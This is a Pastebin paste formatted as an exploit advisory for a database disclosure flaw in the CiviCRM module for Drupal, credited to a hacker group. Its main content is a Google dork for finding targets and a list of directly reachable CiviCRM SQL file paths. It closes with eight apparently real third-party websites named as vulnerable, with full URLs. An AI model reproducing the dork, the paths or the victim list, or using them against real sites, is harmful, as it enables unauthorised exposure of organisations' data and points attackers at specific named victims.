API tools faq
paste
KingSkrupellos

Drupal 7 CivicRM Modules 5.8.2 Database Disclosure

KingSkrupellos
Dec 23rd, 2018
84
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.74 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : Drupal 7 CivicRM Modules 5.8.2 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 24/12/2018
  6. # Vendor Homepage : drupal.org - civicrm.org
  7. # Software Download Link : download.civicrm.org/civicrm-5.8.2-drupal.tar.gz
  8. + drupal.org/project/civicrm
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Version Information : Drupal V7.0 and 8.0 - CivicRM V5.8.2
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/sites/all/modules/civicrm/sql/''
  14. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  15. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  16.  
  17. #################################################################################################
  18.  
  19. # Exploit :
  20.  
  21. /sites/all/modules/civicrm/sql/case_sample.mysql
  22.  
  23. /sites/all/modules/civicrm/sql/civicrm.mysql
  24.  
  25. /sites/all/modules/civicrm/sql/civicrm_acl.mysql
  26.  
  27. /sites/all/modules/civicrm/sql/civicrm_case_sql.mysql
  28.  
  29. /sites/all/modules/civicrm/sql/civicrm_data.mysql
  30.  
  31. /sites/all/modules/civicrm/sql/civicrm_demo_processor.mysql
  32.  
  33. /sites/all/modules/civicrm/sql/civicrm_devel_config.mysql
  34.  
  35. /sites/all/modules/civicrm/sql/civicrm_drop.mysql
  36.  
  37. /sites/all/modules/civicrm/sql/civicrm_dummy_processor.mysql
  38.  
  39. /sites/all/modules/civicrm/sql/civicrm_generated.mysql
  40.  
  41. /sites/all/modules/civicrm/sql/civicrm_generated_report.mysql
  42.  
  43. /sites/all/modules/civicrm/sql/civicrm_navigation.mysql
  44.  
  45. /sites/all/modules/civicrm/sql/civicrm_navigation.mysql
  46.  
  47. /sites/all/modules/civicrm/sql/civicrm_sample.mysql
  48.  
  49. /sites/all/modules/civicrm/sql/civicrm_sample_custom_data.mysql
  50.  
  51. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.1_v1.2_40.mysql
  52.  
  53. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.1_v1.2_41.mysql
  54.  
  55. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.2_v1.3_40.mysql
  56.  
  57. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.2_v1.3_41.mysql
  58.  
  59. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.3_v1.4_40.mysql
  60.  
  61. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.3_v1.4_41.mysql
  62.  
  63. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.4_v1.5_40.mysql
  64.  
  65. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.4_v1.5_41.mysql
  66.  
  67. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.5_v1.6_40.mysql
  68.  
  69. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.5_v1.6_41.mysql
  70.  
  71. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.6_v1.7_40.mysql
  72.  
  73. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.6_v1.7_41.mysql
  74.  
  75. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.7_v1.8_41.mysql
  76.  
  77. /sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.8_v1.9_41.mysql
  78.  
  79. #################################################################################################
  80.  
  81. # Example Vulnerable Sites =>
  82.  
  83. [+] eventos.icb.ufmg.br/sbc/sites/all/modules/civicrm/sql/civicrm_devel_config.mysql
  84.  
  85. [+] odeon.dk/sites/all/modules/civicrm/sql/civicrm.mysql
  86.  
  87. [+] everythingposture.com/stretchsit/sites/all/modules/civicrm/sql/civicrm_data.mysql
  88.  
  89. [+] svn.ashlock.us/public/coop-members/sites/all/modules/civicrm/sql/civicrm_generated.mysql
  90.  
  91. [+] old.stirlingswimming.co.uk/sites/all/modules/civicrm/sql/civicrm_drop.mysql
  92.  
  93. [+] dev.serhouston.org/sites/all/modules/civicrm/sql/civicrm_generated.mysql
  94.  
  95. [+] pnhp.org/sites/all/modules/civicrm/sql/civicrm_case_sql.mysql
  96.  
  97. [+] 66.39.116.79/sites/all/modules/civicrm/sql/civicrm_upgradedb_v1.8_v1.9_41.mysql
  98.  
  99. #################################################################################################
  100.  
  101. # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
  102.  
  103. #################################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!